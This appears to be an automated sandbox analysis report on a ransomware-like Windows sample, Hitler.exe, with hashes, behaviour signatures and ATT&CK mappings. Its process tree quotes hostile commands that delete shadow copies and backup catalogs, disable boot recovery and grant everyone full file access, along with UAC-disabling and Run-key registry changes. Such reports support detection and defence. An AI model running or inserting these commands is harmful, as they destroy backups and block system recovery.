Analysis
max time kernel
11s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags
arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
submitted
20/11/2024, 12:38
Behavioral task
behavioral1
Sample
Hitler.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Hitler.exe
Resource
win10v2004-20241007-en
General
Target
Hitler.exe
Size
3.4MB
MD5
e64dbe09fc1805177d9058a40807e128
SHA1
fc15f43be27987315c8bcf61ff392ff8ac3e394c
SHA256
9ae7d51b7c3e729d9fd0eb7b99811de3270e7b37931fff1f136efeb50d276a4c
SHA512
806a78516ac5f08852fb80b702f5bfb891bb874542609641cc83bca13330554f1e670bf1544189eed15fe43facbee6765651d2ce7a6971ef57473696bb3cdccd
SSDEEP
98304:h8srYwCbFbLFVeGoXSKUa+sRlKSZt646FVbCJUpQdAahhGvLlhkmyNe4y4WNMvs:hh0b5eGoC0PRB6JPk6
Malware Config
Signatures
Process Hitler.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
Modifies file permissions 1 TTPs 1 IoCs
PID 464 icacls.exe
Adds Run key to start application 2 TTPs 1 IoCs
Process Hitler.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Adolf Hitler = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Hitler.exe"
Process Hitler.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Drops desktop.ini file(s) 3 IoCs
Process Hitler.exe: File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI
Process Hitler.exe: File created C:\$Recycle.Bin\S-1-5-21-2437139445-1151884604-3026847218-1000\desktop.ini
Process Hitler.exe: File created C:\Program Files\desktop.ini
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Process Hitler.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\×ÀÃæ±³¾°Í¼Æ¬.bmp"
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 1 IoCs
Process Hitler.exe: File created C:\Windows\×ÀÃæ±³¾°Í¼Æ¬.bmp
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Process Hitler.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Process icacls.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Process cmd.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Process WMIC.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Suspicious behavior: EnumeratesProcesses 40 IoCs
Suspicious use of AdjustPrivilegeToken 48 IoCs
Suspicious use of SetWindowsHookEx 2 IoCs
PID 1668 Hitler.exe
PID 1668 Hitler.exe
Suspicious use of WriteProcessMemory 9 IoCs
PID 1668 (Hitler.exe) wrote to memory of 464, target 83
PID 1668 (Hitler.exe) wrote to memory of 464, target 83
PID 1668 (Hitler.exe) wrote to memory of 464, target 83
PID 1668 (Hitler.exe) wrote to memory of 5020, target 84
PID 1668 (Hitler.exe) wrote to memory of 5020, target 84
PID 1668 (Hitler.exe) wrote to memory of 5020, target 84
PID 5020 (cmd.exe) wrote to memory of 4316, target 88
PID 5020 (cmd.exe) wrote to memory of 4316, target 88
PID 5020 (cmd.exe) wrote to memory of 4316, target 88
System policy modification 1 TTPs 1 IoCs
Process Hitler.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Users\Admin\AppData\Local\Temp\Hitler.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\Hitler.exe"
  - UAC bypass
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Drops desktop.ini file(s)
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:1668
  C:\Windows\SysWOW64\icacls.exe
    command line: icacls . /grant Everyone:F /T /C /Q
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:464
  C:\Windows\SysWOW64\cmd.exe
    command line: cmd /c vssadmin delete shadow /all /quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5020
    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command line: wmic shadowcopy delete
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
      PID:4316
C:\Windows\system32\AUDIODG.EXE
  command line: C:\Windows\system32\AUDIODG.EXE 0x320 0x3c8
  - Suspicious use of AdjustPrivilegeToken
  PID:3824
C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID:4624
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism (1)
Bypass User Account Control (1)
Boot or Logon Autostart Execution (1)
Registry Run Keys / Startup Folder (1)
Defense Evasion
Abuse Elevation Control Mechanism (1)
Bypass User Account Control (1)
File and Directory Permissions Modification (2)
Windows File and Directory Permissions Modification (1)
Impair Defenses (1)
Disable or Modify Tools (1)
Indicator Removal (1)
File Deletion (1)
Modify Registry (4)
Downloads
Filesize
129B
MD5
a526b9e7c716b3489d8cc062fbce4005
SHA1
2df502a944ff721241be20a9e449d2acd07e0312
SHA256
e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512
d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
Filesize
2.4MB
MD5
3903d19844a4e4dfb0cd919842b01ccd
SHA1
7a6a04552ef57a4e2e15df8190fa136acf232b99
SHA256
c1b11091d66e6e89c0e190aef1bfd7c5d566bcb03fb90e1a5cb8e8462387ceb4
SHA512
43c4cdd3b1de62a5906aa6ceaf98fd7b36be41df1576bf89121336d8d48913768e461053e4f1f099faf49877e3cf8ea68bfb7509a6e6e35b36cb8fd2f856058a